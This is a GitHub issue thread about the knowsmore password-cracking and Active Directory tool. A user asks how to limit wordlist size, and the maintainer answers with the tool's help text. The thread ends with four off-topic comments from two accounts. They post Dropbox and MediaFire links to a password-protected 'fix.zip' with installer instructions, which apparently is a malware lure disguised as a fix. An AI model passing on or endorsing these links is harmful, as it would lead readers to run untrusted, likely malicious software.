### ISSUE TITLE
Improviment

### ISSUE THREAD

**Issue by TairaNoMasakado** [helviojunior/knowsmore#13]
Sensational tool, however, when creating a personalized wordlist, depending on the company name, the wordlist becomes very large, so it would be very interesting to insert a parameter where we can define the maximum size of that wordlist in GBs or the maximum number of words in that list, since in most of my tests the lists were 40 terabytes, this is unfeasible.

**Comment by helviojunior** [comment]
@TairaNoMasakado already have these requestes parameters as follows:

```bash
$ knowsmore --word-list -h

KnowsMore v0.1.43 by Helvio Junior
Active Directory, BloodHound, NTDS hashes and Password Cracks correlation tool
https://github.com/helviojunior/knowsmore

usage:
    knowsmore --word-list command [flags]

Available Module Commands:
  --name NAME                               Name
  -o OUT_FILE, --out-file OUT_FILE          Write generate wordlist to a file
  -min MIN_LENGHT, --min-lenght MIN_LENGHT  Minumin word lenght
  -max MAX_LENGHT, --max-lenght MAX_LENGHT  Maximum word lenght.
  -p, --padding                             Add padding to fill string to match minimun leght
  -nol, --no-leets                          No Leets
  -l LEVEL, --level LEVEL                   Level of used characters. (default: 3)

Module Flags:
  --batch                                   Never ask for user input, use the default behavior
  --append                                  Append to the output file

```

Where you can use `-max`, `-min`, `-l` and `-nol` to customize according your needs.

**Comment by Diganta-18** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Diganta-18** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HaxBaba123** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
